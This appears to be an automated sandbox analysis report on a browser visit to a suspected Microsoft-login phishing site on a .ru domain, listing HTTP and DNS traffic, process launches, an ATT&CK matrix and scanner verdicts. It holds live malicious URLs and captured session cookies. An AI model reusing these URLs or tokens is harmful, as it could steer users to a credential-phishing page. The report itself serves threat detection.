Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://2ol.itectaxice.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901e8eeb3e1dc337&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 2ol.itectaxice.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2ol.itectaxice.ru/Qm75/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InFNTGdQdjV4dmMrd0lLNTFOdld2bmc9PSIsInZhbHVlIjoicEI5T0wzcGlqS0FZRkdjMmt6YStjY2lkdTE0cHg4dkxWL2hhWWczUlF6ekhzT013QU50aG9Jc3FJZm5MUXR5bEZSaTBXendNbXBtMFhKV2tvZnVHYUkvdVo3cllpYnltalFNdlRlTjc0cGpBT0V3YmtGeVMvL2tIN3hZT1U5aXoiLCJtYWMiOiIyNjA4YTdjMTNjMjRkMmI5N2M5Mjg0MWZjMzRiYWQ1ZjdlM2VkZDY0NjkwOWUxOGMwNjY3MjgyOGYwOTNmZGVlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkltRDBwY2hSeXQxTDB2d1hFaWUrdmc9PSIsInZhbHVlIjoiNEJVTi9xdC96MkEzcmJoQU04N3BhdmlqczA5Q1REdDRDeThXSnI0Z0prYmlpa0Z0Z2U0RnRLR2ozcUplM0JWS3FiclJ6bmZTTDM2ZUNTYWhUVm9EUmcwVXZTVnFuYldLbkQzTGhDd3Z5VU5TblRISXAxVHY2TnVCNzBubWVjTnAiLCJtYWMiOiI4NzExYjBmZjIzMGUwNzIzYTk1YzhkYjQwZjE5Y2EwYmQ0YTViMjdhOWYxNzFkYTFkMDU5M2EyZmE1M2I1OTg1IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901e8eeb3e1dc337&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/901e8eeb3e1dc337/1736867485183/844ee1c3a71c8134456f00e78e0c84bc733cc76369eb27f0341e9bb6f1468708/Y_EY6Ha2KYLod_Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901e8eeb3e1dc337/1736867485190/-jhu53-RLAzm1Ay HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901e8eeb3e1dc337/1736867485190/-jhu53-RLAzm1Ay HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZ HTTP/1.1Host: aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://2ol.itectaxice.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://2ol.itectaxice.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZ HTTP/1.1Host: aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: 2ol.itectaxice.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3162sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyANsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:11:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STDMai5FCe%2FxVgtmq82CVdIFbVQ%2FkkxjbFk68xVQSF9k7DsZTCb7MdSgpsC6Yb0ArlyuycI3jlcOH%2FjA96B4%2FddYyqVoZ%2FByo6CDjA%2FnjPUqcQ4AhGnsUAr3RLH%2BOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5472&min_rtt=5450&rtt_var=1574&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2232&delivery_rate=510668&cwnd=251&unsent_bytes=0&cid=efc8f949ee0e58bd&ts=154&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 901e8ef27f6ac445-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1668&rtt_var=631&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1896&delivery_rate=1727810&cwnd=232&unsent_bytes=0&cid=f8fa9c0cdeee5694&ts=4287&x=0"
Source: chromecache_73.2.dr, chromecache_62.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_73.2.dr, chromecache_62.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal56.win@20/68@36/15
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1908,i,5728571239909493604,3707031893138977265,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://2ol.itectaxice.ru/Qm75/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1908,i,5728571239909493604,3707031893138977265,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://2ol.itectaxice.ru/Qm75/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://2ol.itectaxice.ru/favicon.ico0%Avira URL Cloudsafe
https://aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru/zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZ100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.194.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.25.14
      truefalse
        high
        aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru
        104.21.42.208
        truefalse
          unknown
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              sni1gl.wpc.omegacdn.net
              152.199.21.175
              truefalse
                high
                www.google.com
                172.217.18.4
                truefalse
                  high
                  2ol.itectaxice.ru
                  188.114.96.3
                  truetrue
                    unknown
                    www.office.com
                    unknown
                    unknownfalse
                      high
                      identity.nel.measure.office.net
                      unknown
                      unknownfalse
                        high
                        aadcdn.msftauth.net
                        unknown
                        unknownfalse
                          high
                          login.microsoftonline.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                              high
                              https://2ol.itectaxice.ru/Qm75/true
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyANfalse
                                  high
                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    high
                                    https://a.nel.cloudflare.com/report/v4?s=STDMai5FCe%2FxVgtmq82CVdIFbVQ%2FkkxjbFk68xVQSF9k7DsZTCb7MdSgpsC6Yb0ArlyuycI3jlcOH%2FjA96B4%2FddYyqVoZ%2FByo6CDjA%2FnjPUqcQ4AhGnsUAr3RLH%2BOA%3D%3Dfalse
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901e8eeb3e1dc337&lang=autofalse
                                          high
                                          https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                            high
                                            https://2ol.itectaxice.ru/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/901e8eeb3e1dc337/1736867485190/-jhu53-RLAzm1Ayfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/901e8eeb3e1dc337/1736867485183/844ee1c3a71c8134456f00e78e0c84bc733cc76369eb27f0341e9bb6f1468708/Y_EY6Ha2KYLod_Zfalse
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/false
                                                  high
                                                  https://aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru/zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
